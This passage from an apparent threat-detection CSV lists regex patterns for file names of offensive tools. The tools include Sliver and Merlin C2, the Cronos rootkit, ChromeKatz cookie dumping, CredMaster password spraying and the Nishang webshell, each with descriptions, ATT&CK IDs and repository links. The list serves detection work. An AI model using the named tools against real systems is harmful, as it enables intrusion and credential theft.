Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\codeloader.exe*",".{0,1000}\\codeloader\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","0","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*\CoercedPotato.cpp*",".{0,1000}\\CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*\coercer.exe*",".{0,1000}\\coercer\.exe.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - 
TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*\Coercer.py*",".{0,1000}\\Coercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*\COFFLoader.exe*",".{0,1000}\\COFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\combine.exe*",".{0,1000}\\combine\.exe.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\combine_gui.exe*",".{0,1000}\\combine_gui\.exe.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\COMHijackToolkit.ps1*",".{0,1000}\\COMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMHijackToolkit\*",".{0,1000}\\COMHijackToolkit\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools 
for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COM-Hunter.csproj*",".{0,1000}\\COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*\COM-Hunter.exe*",".{0,1000}\\COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*\COM-Hunter.sln*",".{0,1000}\\COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*\COMInject.exe*",".{0,1000}\\COMInject\.exe.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMInject.sln*",".{0,1000}\\COMInject\.sln.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" 
"*\COMInjectTarget.cpp*",".{0,1000}\\COMInjectTarget\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMInjectTarget.dll*",".{0,1000}\\COMInjectTarget\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMInjectTarget\*",".{0,1000}\\COMInjectTarget\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\Command Reciever.exe*",".{0,1000}\\Command\sReciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\command\exec\sideload.go*",".{0,1000}\\command\\exec\\sideload\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\command\exec\spawndll.go*",".{0,1000}\\command\\exec\\spawndll\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\command_exec.exe*",".{0,1000}\\command_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\commands\CameraScreenShot.cs*",".{0,1000}\\commands\\CameraScreenShot\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\common_pass.txt*",".{0,1000}\\common_pass\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" 
"*\COM-Object-hijacking-master*",".{0,1000}\\COM\-Object\-hijacking\-master.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*\CompressArchiveCommand.cs",".{0,1000}\\CompressArchiveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\ComunicationC2.cpp*",".{0,1000}\\ComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\CONCRETE_STEEL.exe""*",".{0,1000}\\CONCRETE_STEEL\.exe\"".{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\Configure-Server.psm1*",".{0,1000}\\Configure\-Server\.psm1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Configure-Victim.ps1*",".{0,1000}\\Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\ConfuserEx.exe*",".{0,1000}\\ConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*\ConfuserEx\*",".{0,1000}\\ConfuserEx\\.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - 
T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*\ConfuserEx\Obfuscated.exe*",".{0,1000}\\ConfuserEx\\Obfuscated\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ConfuserEx_bin.zip*",".{0,1000}\\ConfuserEx_bin\.zip.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*\Convert-ROT47.ps1*",".{0,1000}\\Convert\-ROT47\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\CookieData.txt 
--all*",".{0,1000}\\CookieData\.txt\s\-\-all.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*\CookieHijack.ps1*",".{0,1000}\\CookieHijack\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\CookieKatz.vcxproj*",".{0,1000}\\CookieKatz\.vcxproj.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\CookieKatz-BOF\*",".{0,1000}\\CookieKatz\-BOF\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\CookieKatzMinidump\*",".{0,1000}\\CookieKatzMinidump\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from 
Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\Cooolis-ms-Loader\*",".{0,1000}\\Cooolis\-ms\-Loader\\.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*\CopyItemCommand.cs",".{0,1000}\\CopyItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. 
only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Copy-VSS.ps1*",".{0,1000}\\Copy\-VSS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\crackmapexecwin*",".{0,1000}\\crackmapexecwin.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\cradle.ps1*",".{0,1000}\\cradle\.ps1.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*\cradle.ps1*",".{0,1000}\\cradle\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Crassus-main*",".{0,1000}\\Crassus\-main.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*\Create-HotKeyLNK.ps1*",".{0,1000}\\Create\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Create-MultipleSessions.ps1*",".{0,1000}\\Create\-MultipleSessions\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\credentials.log*",".{0,1000}\\credentials\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\creditcards.py*",".{0,1000}\\creditcards\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\credmaster.py*",".{0,1000}\\credmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" 
"*\CredMaster-master.zip*",".{0,1000}\\CredMaster\-master\.zip.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\credmaster-success.txt*",".{0,1000}\\credmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\credmaster-validusers.txt*",".{0,1000}\\credmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\CredsPhish.log*",".{0,1000}\\CredsPhish\.log.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\Cronos Rootkit.sln*",".{0,1000}\\Cronos\sRootkit\.sln.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\Cronos Rootkit\*",".{0,1000}\\Cronos\sRootkit\\.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\CronosDebugger.vcxproj*",".{0,1000}\\CronosDebugger\.vcxproj.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\Cronos-x64.zip*",".{0,1000}\\Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
